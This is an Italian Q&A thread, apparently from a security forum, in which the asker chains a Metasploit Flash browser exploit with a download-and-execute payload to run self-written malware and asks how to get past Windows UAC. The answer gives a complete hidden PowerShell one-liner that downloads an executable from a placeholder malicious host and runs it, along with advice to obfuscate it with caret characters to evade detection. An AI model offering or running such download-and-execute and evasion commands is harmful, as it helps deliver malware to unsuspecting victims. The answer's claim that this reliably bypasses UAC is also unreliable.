Bypass UAC senza sessione meterpreter?

1

Ho un progetto di ricerca su "Malvertising". Provo a mostrare un attacco usando metasploit e sto usando un plugin Flash per hackerare la vittima (exploit / multi / browser / adobe_flash_hacking_team_uaf)

Funziona bene e voglio eseguire un malware invasivo autosviluppato. Quindi sto usando come payload (windows / download_exec) per scaricare il mio file.

Windows 7 supporta l'UAC, quindi non posso avviare il mio file senza chiedere conferma.

So che metasploit ha alcuni exploit per aggirare UAC, ma tutti richiedono una sessione meterpreter. Non ce l'ho nel mio caso.

Posso utilizzare questo exploit per integrarlo con il mio malware?

    
posta Ulf 31.05.2016 - 10:33
fonte

1 risposta

1

Ci sono molti altri modi per aggirare UAC indipendentemente dall'uso di metasploit, dal momento che stai parlando di plugin Flash, il tuo "exploit" verrà consegnato tramite un browser. Se prendi l'esempio del malware "senza dimestichezza" senza file recentemente scoperto, il carico utile viene eliminato usando Powershell, per evitare il rilevamento statico introduce caratteri che la shell di Windows ignorerà (ad esempio: ^), ma il codice "leggibile" che sarà sicuramente bypassare UAC sarà simile:

cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://malicious.ma/somefolder/your_payload.exe','%dropfolder%.exe');start-process '%dropfolder%.exe'"

Il passaggio tramite cmd generalmente garantisce un bypass UAC, almeno a livello di utente.

    
risposta data 30.03.2017 - 16:48
fonte

Leggi altre domande sui tag